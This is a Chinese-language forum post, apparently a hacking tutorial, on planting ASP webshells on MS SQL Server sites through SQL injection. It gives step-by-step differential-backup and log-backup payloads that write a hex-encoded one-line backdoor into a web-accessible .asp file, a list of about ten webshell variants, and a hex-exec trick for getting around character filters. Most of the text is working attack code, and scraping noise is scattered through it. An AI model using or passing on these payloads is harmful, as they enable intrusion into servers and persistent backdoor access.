MSsql差异备份总结

admin

差异备份的流程大概这样：
8 ]+ J7 s' c4 D+ [' P/ `# J1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

1 v( y8 z" r) l' x8 o2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
! \6 r# ^% B# pinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
. z9 s3 I( e, F! e5 U
2 L! j! j- {: {' R6 @, v3.进行差异备份
' M# l- y7 `0 s$ F9 rbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
6 B: i9 W! f" ^- }, \& ~
上面
1 W" s+ \1 {: X7 x# }" _0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

- I, [1 ~* C  R如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
4 S7 T' G) Z1 B1 t1 U; e( k) U步骤:
' w. m# {- f" K0 q3 B. A
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
+ ?8 s" e1 }  e1 Z7 M3 f* N5 f  M
4 P5 s# j5 G" O% w. R3 Vcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


; T* L0 p6 D3 F' S3 S# R& [" Winsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

% Q7 x* A! J& vdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
" O- k/ p: U8 t/ Y# h
3 N. _4 w+ W7 Mdrop table [xiaolu]  -- 删除此表。
5 z3 ]' [* ~  @2 P/ d6 C  a+ o, k
0 {7 C4 d! S$ V) ]% [" \4 H5 s0x77006F006B0061006F002E00620061006B00为wokao.bak
7 d- ~; F, w) J0 A- Z" R- ~0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
( `9 ~! [8 w; C+ g1 Q
声明：方法不是我想的，我只是写工具，默认得到shell是
4 P) U; h$ p2 `  r<%execute(request("a"))%>
===============================================================
/ ^& w8 b0 o0 R! x9 b" o/ b, V
- O2 ^# }8 _- w* Y7 Z" T, N* C我发现上面代码，有时会无效，而直接用

6 f/ R" r: M5 R5 |backup database 库名 to disk = 'c:\ddd.bak'

  E4 J" Z; \7 m2 p* Dcreate table [dbo].[dtest] ([cmd] [image]);
0 E& ]5 X: `: W: P, E# e4 `" y
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
5 S" K( ]9 ~0 m$ t- q
9 \6 C9 S. t& i7 s$ J+ ^backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
0 ~5 c; \, M! p- b- S; o
5 d% E8 T7 Q/ Z) f+ T: u' u; z$ D却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
. ^! B/ @- h+ M; g2 i0 ^
: e7 }# X* _) |0 n8 ^) u库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
=====================================================
6 x: H+ O% ]/ N/ R4 s+ K另一种log增量备份技术:
# B: R. Z+ e+ n1 g8 Z
';alter database null set RECOVERY FULL--
5 d7 A  V2 E+ U
';create table cmd (a image)--

9 O6 [$ A; m) _, K/ V* H';backup log null to disk = 'f:\cmd' with init--
6 e8 A% {7 t0 T8 h  C5 c
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
: o  n  S& [( [+ h/ x
' A1 n5 d6 \4 D+ ?+ @2 D0 ?';backup log null to disk = '备份路径'--
% H+ v5 W/ D0 r6 l
';drop table cmd--
7 @) f6 H9 J4 \4 b* w
';alter database XXX set RECOVERY SIMPLE--

PS:0x3C2565786563757465287265717565737428226122292
  z/ P9 l8 K1 A# @9253EDA 是一句话小马16进制转来的

; @2 v$ b$ m) F3 Q6 Y* j说到一句话马，还可以有这么几种写法：
4 u5 p, A( `% \4 ]# M) D/ b, B9 ?
8 S; K( U) w' H& \a)<%%25Execute(request("a"))%%25>
. h/ Y+ I' l6 k* C) C" s8 a) }b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
5 u( ]+ v% Y) C) u( c/ O- O! nf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
/ l" j3 d" ], \I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
$ l: V$ s0 |- t
; [/ c" R3 r( k8 y# s) f=============================================
3 V5 C5 F8 b, a9 g8 |- J; s! G% R
当遇到差备过滤了/时用这个语句代替

4 e' h1 ]- b' t$ Z- I- G1 g  }declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

& G; b) A: }' b* J% j把要执行的语句转16进制然后用exec执行

: G$ E' U6 q) R- s) Q
减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
6 l7 u5 o/ N' Q% _& e. X2
' Z6 }6 g8 W" q0 k- l" Z$ x" Iid=1;backup database model to disk='你的路径‘ with differential,format;--

* o. ]7 }- v  E% V$ b
- }' ~- e  D# t7 d( O6 U4 b& v
) L- o1 S2 \+ q: f3 I2 m2 G+ I4 C& V8 Y/ qSQL语句清理日志
注：test为数据库名

--清空日志
DUMP TRANSACTION test WITH NO_LOG
" o* ~% P2 Z- D6 _* V5 w9 O% |
--截断事务日志
5 r, @- W: @$ I+ N4 C+ bBACKUP LOG test WITH NO_LOG
5 L- ~* I6 i1 T/ ]/ S- l( _
( p' t6 G& F: s. E6 i4 t--收缩数据库
DBCC SHRINKDATABASE(test)

7 m% Z* [% o% Z; E, C8 R' m; X--收缩指定数据文件,1是文件号,可以通过这个语句查询到
# O- l* ?# q: n8 ISelect * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'